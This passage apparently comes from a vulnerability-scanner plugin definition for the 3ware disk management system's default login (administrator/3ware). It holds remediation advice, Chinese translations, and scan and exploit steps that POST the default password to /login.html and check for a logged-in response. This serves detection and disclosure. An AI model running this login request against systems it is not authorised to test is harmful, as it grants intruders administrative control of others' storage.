3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.
Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.
1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.
2. If it is not necessary, it is forbidden to access the system from the public network.
3. Set access policies and whitelist access through security devices such as firewalls.
", "References": [ "https://fofa.info/" ], "Is0day": false, "HasExp": true, "ExpParams": [], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/login.html", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "whopwd=a&thepwd=3ware" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "TDMUSER", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "logged", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/login.html", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "whopwd=a&thepwd=3ware" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "TDMUSER", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "logged", "bz": "" } ] }, "SetVariable": [ "output|lastbody|text|(administrator/3ware)" ] } ], "Tags": [ "default Password" ], "VulType": [ "default Password" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "5.0", "Translation": { "CN": { "Name": "3ware 默认口令漏洞", "Product": "3ware", "Description": "3ware 是一款磁盘管理系统。该系统存在默认口令,攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。
1、修改默认口令,密码最好包含大小写字母、数字和特殊字符等,且位数大于8位。
2、如非必要,禁止公网访问该系统。
3、通过防火墙等安全设备设置访问策略,设置白名单访问。
", "Impact": "攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。
3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.
1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.
2. If it is not necessary, it is forbidden to access the system from the public network.
3. Set access policies and whitelist access through security devices such as firewalls.
", "Impact": "Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.